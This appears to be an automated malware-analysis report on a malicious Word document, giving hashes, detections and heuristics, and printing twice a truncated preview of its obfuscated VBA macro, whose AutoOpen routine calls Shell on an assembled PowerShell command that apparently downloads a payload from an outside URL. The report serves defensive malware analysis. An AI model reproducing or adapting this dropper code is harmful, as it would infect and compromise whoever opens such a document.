Office (OLE) malware analysis — malicious · 84586e119ccbdb29

MALICIOUS

Office (OLE)

177.5 KB Created: 2017-12-14 22:05:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: b3d416303d4b9596404d3ef09fcd536e SHA-1: da8c91f55c20c49c14bf13755bc7db1c8e418061 SHA-256: 84586e119ccbdb2964a2b52bd047dcbe3fa69700ded0ca5495205e916f9bf3b9

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Img.Dropper.PhishingLure-6443153-0'. Static analysis revealed a VBA macro with an AutoOpen function that utilizes the Shell() function. This indicates the macro is designed to execute an external command, likely to download and run a secondary payload, which is a common technique for malware droppers.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://iJnt+JntnJnt+Jj8WPkwj1j� In document text (OLE body)
- http://wwJnt+Jntw.Jnt+JntwDJ7OlSbfC�In document text (OLE body)
- http://iJnt+JntnJnt+Jj8WPkwj1jIn document text (OLE body)
- http://wwJnt+Jntw.Jnt+JntwDJ7OlSbfCIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 76486 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	76486 bytes
SHA-256: `ea0b2e335d8b222dbfe81141fada5b38a8d00a12ba604b6d975632d1a15c74be`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qkwkjMMdzb" Sub AutoOpen() KCpustH = "FORJCujt" + "BsJIZup" + "WYhGTAEz" + "iqzLlZzXPUozBw" + "kujlZwlIAlV" + "aBlONLFLpu" + "PTMkJZAJVaFWZ" + "SYBzizZPD" + "WiGbnvmlqB" + "SMLbizczv" + "fMzunEOGuT" + "PpOfTZW" nTfXwALpVAz = "QICqRJjzqYiviS" + "XzwPZGZ" + "AzozucPs" + "vVjGmXNJ" + "WjPokpfzorYkaq" + "BCqdKmXbfYAMi" + "kZjFjkprLPzUwn" + "TWVitFkhkz" + "wIkQjcwC" + "SpitGBJ" + "adqqkELCfipqz" + "zFYlhHufXXtjF" rbXrwtGGJRO = "YOEuGME" + "qZVVTBwvFS" + "AzhKDKztGmswHW" + "jjadRhifnSG" + "YuzKArV" + "EqDAjISwn" + "cNwqSQUcAOVTus" + "IZzIbrEmIYtcZt" + "PjsppsDh" + "hqYrGslvKDb" + "SpLGXaqRYnui" + "wpbEDEErXblSN" QnzRWSazqhj = "RNQDtvpzI" + "JrHwXrv" + "ZnKvadbWX" + "RBwtVlnrb" + "ipdNXMdFK" + "ujBcHvHWmm" + "WXYiHEPWVLf" + "cfjKwXNzV" + "zVizVmZi" + "EorLSEfQI" + "joNPTZzXl" + "zZmGKYDA" VBA.Shell$ jIzzfRN, 0 idwquabk = "RFRHFllXlG" + "ZYPoTQfBk" + "uBiIZkm" + "SosodFftsTAUmm" + "lhKNIWdvZASXEm" + "fBzZTRWkvJIaYL" + "PPHEsaP" + "dbotSoLibH" + "ozVMTiPwPEzwFj" + "lCPztXQiVw" + "YDwjahSfXBt" + "oaddASi" jJuCISbOVXV = "OoFLzfdSdaMWrA" + "ZPtQMrTuPJu" + "IFEJzjtozUS" + "UoLAJzXKIrC" + "cHIIuuqBFEVMZQ" + "qwMbEwPv" + "fTlRljSQCG" + "rXluFdRYPTwb" + "khMvPwCMMlcbI" + "QWmEKTjVSM" + "WbfrfDjrs" + "DWWBEDUflITw" BCdPoIJ = "OAdsWWUjh" + "jQrMzPDFPOpjDw" + "WipCosijSp" + "sIhjAzDNjj" + "oCNMjtuZh" + "iTAsfdtDAhZXcX" + "XiOqdqPtJpmpcI" + "osHaNphoUVKJi" + "oRaqRLKjjEFPZr" + "soQvKsj" + "CJFqutUSj" + "uUXMzLwiIJC" End Sub Function jIzzfRN() IJFlHrZio = IsNull("iBmcUNiaKwVJu") + IsNull("vtuhjQnF") + IsNull("PujsEMMqbjP") + IsNull("DwWDIYjzWc") + IsNull("RBDiTGXSAZVX") + IsNull("lViNwItZiprv") + IsNull("ibsDFJmNSq") vcawMiWR = IsNull("vGjKnouZvwCT") + IsNull("YzHFtMHj") + IsNull("BzMPSnPlcEczLA") + IsNull("sFFYwPzNkuF") + IsNull("paiiTCA") + IsNull("kwXVHJK") + IsNull("wqLMzcNoGj") qbJiFms = Mid("rn4:publiMTI+M7cWmhHvjP0wzuX7a7bY4ujwuEPm0hGrwN", 4, 11) cbfkoaRusJ = IsNull("dtjEQPw") + IsNull("aoRnuVBNiHmL") + IsNull("nvcvZwTM") + IsNull("UTicjEYpJPtK") + IsNull("kMnwiDvEFj") + IsNull("pqzHIqScVqT") + IsNull("IRlwptzWSBSLPH") hbwfJbWhTfw = IsNull("iwckKalsp") + IsNull("VnEtoziVdY") + IsNull("whdhzcRhzG") + IsNull("NrcXitdaicjGh") + IsNull("AqjPUAa") + IsNull("wjQzCMzTKqR") + IsNull("ZMRQSosDpsP") HVZCsTRzOBs = IsNull("NPQjPnzntHR") + IsNull("SwQoiQNfhwH") + IsNull("KHJMnYm") + IsNull("BPEMEJELJdspY") + IsNull("fZBNnuBc") + IsNull("RIKVHdnAUUZfCs") + IsNull("kVMCVDD") LBiWCrCZW = Mid("zbW')-creplaCe([cHAr]77+[cHAr]84+[cHAr]73),[cHAr]39 -creplaCe ([cHAr]57+[cHAr]87+[cHAr]70),[cHAr]36 -rEpLACe 'wpQlmRQ7O83qkw2LlmJBBjuQlmzD83a74d", 4, 113) SoivBKvw = IsNull("vczlkRfGPiv") + IsNull("GfqQcPStoBinY") + IsNull("zfHXpDUpD") + IsNull("PLisKLPrRY") + IsNull("mwcaaaWm") + IsNull("wKNUUAwssrYRcQ") + IsNull("QjZidmn") DnjMZt = IsNull("qtirbwPtsWs") + IsNull("BIVPJImQ") + IsNull("SXjjTnjXoT") + IsNull("aiKEZuuduAIv") + IsNull("YzFVdRNYIK") + IsNull("WwLHKiVECG") + IsNull("TwQpOOIVTKcH") umGjuXz = IsNull("AGKjfwPdzD") + IsNull("bEwNXKMW") + IsNull("ZAsKiaJtAnJHKo") + IsNull("OJTTwdOa") + IsNull("TowSSCXQP") + IsNull("wANAwEmVcKtBR") + IsNull("lzOrtaVKZ") pEUaXib = Mid("7G9L4nO7vTIndom;HJMTI+MTInt+JntJgJnt+JntbJnt+Jntcd =Jnt+Jnt JntMTI+MTI+Jnt1Jnt+'+'JntCfhttps:Jnt+Jnt//cms.Jnt+JntcpJnt+JntMTI+MTIone-dMTI+MTIev.Jnt+JntcoJnt+Jntm/5KYi6/,Jnt+JnthJnt+JntttJnt+JnMTI+Z9aV2FUMtdAlw3BWaK", 10, 187) WprKIRWQoN = IsNull("WhKtWGMR") + IsNull("mhbjmTLiEs") + IsNull("miHFoCzQn") + IsNull("NuqDldXchwuUv") + IsNull("iOfbpJoF") + IsNull("qVsaFFTHwihY") + IsNull("lfAqoCWwXSivW") JQlZSA = IsNull("VHiXnssPrFERX") + IsNull("nnsAvollI") + IsNull("WdPJHzq") + IsNull("GwDaJtSkvTfN") + IsNull("kwwLUhfwlCkwi") + IsNull("KcjIrOR") + IsNull("aKMiwiKs") FiEFUhWsffL = IsNull("XXbdBIKAit") + IsNull("SXNpwpO") + IsNull("vdzazVmjnTCJi") + IsNull("fwjUAfQckzHm" ... (truncated)

SHA-256: ea0b2e335d8b222dbfe81141fada5b38a8d00a12ba604b6d975632d1a15c74be

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qkwkjMMdzb"
Sub AutoOpen()
KCpustH = "FORJCujt" + "BsJIZup" + "WYhGTAEz" + "iqzLlZzXPUozBw" + "kujlZwlIAlV" + "aBlONLFLpu" + "PTMkJZAJVaFWZ" + "SYBzizZPD" + "WiGbnvmlqB" + "SMLbizczv" + "fMzunEOGuT" + "PpOfTZW"
nTfXwALpVAz = "QICqRJjzqYiviS" + "XzwPZGZ" + "AzozucPs" + "vVjGmXNJ" + "WjPokpfzorYkaq" + "BCqdKmXbfYAMi" + "kZjFjkprLPzUwn" + "TWVitFkhkz" + "wIkQjcwC" + "SpitGBJ" + "adqqkELCfipqz" + "zFYlhHufXXtjF"
rbXrwtGGJRO = "YOEuGME" + "qZVVTBwvFS" + "AzhKDKztGmswHW" + "jjadRhifnSG" + "YuzKArV" + "EqDAjISwn" + "cNwqSQUcAOVTus" + "IZzIbrEmIYtcZt" + "PjsppsDh" + "hqYrGslvKDb" + "SpLGXaqRYnui" + "wpbEDEErXblSN"
QnzRWSazqhj = "RNQDtvpzI" + "JrHwXrv" + "ZnKvadbWX" + "RBwtVlnrb" + "ipdNXMdFK" + "ujBcHvHWmm" + "WXYiHEPWVLf" + "cfjKwXNzV" + "zVizVmZi" + "EorLSEfQI" + "joNPTZzXl" + "zZmGKYDA"
VBA.Shell$ jIzzfRN, 0
idwquabk = "RFRHFllXlG" + "ZYPoTQfBk" + "uBiIZkm" + "SosodFftsTAUmm" + "lhKNIWdvZASXEm" + "fBzZTRWkvJIaYL" + "PPHEsaP" + "dbotSoLibH" + "ozVMTiPwPEzwFj" + "lCPztXQiVw" + "YDwjahSfXBt" + "oaddASi"
jJuCISbOVXV = "OoFLzfdSdaMWrA" + "ZPtQMrTuPJu" + "IFEJzjtozUS" + "UoLAJzXKIrC" + "cHIIuuqBFEVMZQ" + "qwMbEwPv" + "fTlRljSQCG" + "rXluFdRYPTwb" + "khMvPwCMMlcbI" + "QWmEKTjVSM" + "WbfrfDjrs" + "DWWBEDUflITw"
BCdPoIJ = "OAdsWWUjh" + "jQrMzPDFPOpjDw" + "WipCosijSp" + "sIhjAzDNjj" + "oCNMjtuZh" + "iTAsfdtDAhZXcX" + "XiOqdqPtJpmpcI" + "osHaNphoUVKJi" + "oRaqRLKjjEFPZr" + "soQvKsj" + "CJFqutUSj" + "uUXMzLwiIJC"
End Sub
Function jIzzfRN()
IJFlHrZio = IsNull("iBmcUNiaKwVJu") + IsNull("vtuhjQnF") + IsNull("PujsEMMqbjP") + IsNull("DwWDIYjzWc") + IsNull("RBDiTGXSAZVX") + IsNull("lViNwItZiprv") + IsNull("ibsDFJmNSq")
vcawMiWR = IsNull("vGjKnouZvwCT") + IsNull("YzHFtMHj") + IsNull("BzMPSnPlcEczLA") + IsNull("sFFYwPzNkuF") + IsNull("paiiTCA") + IsNull("kwXVHJK") + IsNull("wqLMzcNoGj")
qbJiFms = Mid("rn4:publiMTI+M7cWmhHvjP0wzuX7a7bY4ujwuEPm0hGrwN", 4, 11)
cbfkoaRusJ = IsNull("dtjEQPw") + IsNull("aoRnuVBNiHmL") + IsNull("nvcvZwTM") + IsNull("UTicjEYpJPtK") + IsNull("kMnwiDvEFj") + IsNull("pqzHIqScVqT") + IsNull("IRlwptzWSBSLPH")
hbwfJbWhTfw = IsNull("iwckKalsp") + IsNull("VnEtoziVdY") + IsNull("whdhzcRhzG") + IsNull("NrcXitdaicjGh") + IsNull("AqjPUAa") + IsNull("wjQzCMzTKqR") + IsNull("ZMRQSosDpsP")
HVZCsTRzOBs = IsNull("NPQjPnzntHR") + IsNull("SwQoiQNfhwH") + IsNull("KHJMnYm") + IsNull("BPEMEJELJdspY") + IsNull("fZBNnuBc") + IsNull("RIKVHdnAUUZfCs") + IsNull("kVMCVDD")
LBiWCrCZW = Mid("zbW')-creplaCe([cHAr]77+[cHAr]84+[cHAr]73),[cHAr]39 -creplaCe  ([cHAr]57+[cHAr]87+[cHAr]70),[cHAr]36  -rEpLACe  'wpQlmRQ7O83qkw2LlmJBBjuQlmzD83a74d", 4, 113)
SoivBKvw = IsNull("vczlkRfGPiv") + IsNull("GfqQcPStoBinY") + IsNull("zfHXpDUpD") + IsNull("PLisKLPrRY") + IsNull("mwcaaaWm") + IsNull("wKNUUAwssrYRcQ") + IsNull("QjZidmn")
DnjMZt = IsNull("qtirbwPtsWs") + IsNull("BIVPJImQ") + IsNull("SXjjTnjXoT") + IsNull("aiKEZuuduAIv") + IsNull("YzFVdRNYIK") + IsNull("WwLHKiVECG") + IsNull("TwQpOOIVTKcH")
umGjuXz = IsNull("AGKjfwPdzD") + IsNull("bEwNXKMW") + IsNull("ZAsKiaJtAnJHKo") + IsNull("OJTTwdOa") + IsNull("TowSSCXQP") + IsNull("wANAwEmVcKtBR") + IsNull("lzOrtaVKZ")
pEUaXib = Mid("7G9L4nO7vTIndom;HJMTI+MTInt+JntJgJnt+JntbJnt+Jntcd =Jnt+Jnt JntMTI+MTI+Jnt1Jnt+'+'JntCfhttps:Jnt+Jnt//cms.Jnt+JntcpJnt+JntMTI+MTIone-dMTI+MTIev.Jnt+JntcoJnt+Jntm/5KYi6/,Jnt+JnthJnt+JntttJnt+JnMTI+Z9aV2FUMtdAlw3BWaK", 10, 187)
WprKIRWQoN = IsNull("WhKtWGMR") + IsNull("mhbjmTLiEs") + IsNull("miHFoCzQn") + IsNull("NuqDldXchwuUv") + IsNull("iOfbpJoF") + IsNull("qVsaFFTHwihY") + IsNull("lfAqoCWwXSivW")
JQlZSA = IsNull("VHiXnssPrFERX") + IsNull("nnsAvollI") + IsNull("WdPJHzq") + IsNull("GwDaJtSkvTfN") + IsNull("kwwLUhfwlCkwi") + IsNull("KcjIrOR") + IsNull("aKMiwiKs")
FiEFUhWsffL = IsNull("XXbdBIKAit") + IsNull("SXNpwpO") + IsNull("vdzazVmjnTCJi") + IsNull("fwjUAfQckzHm"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.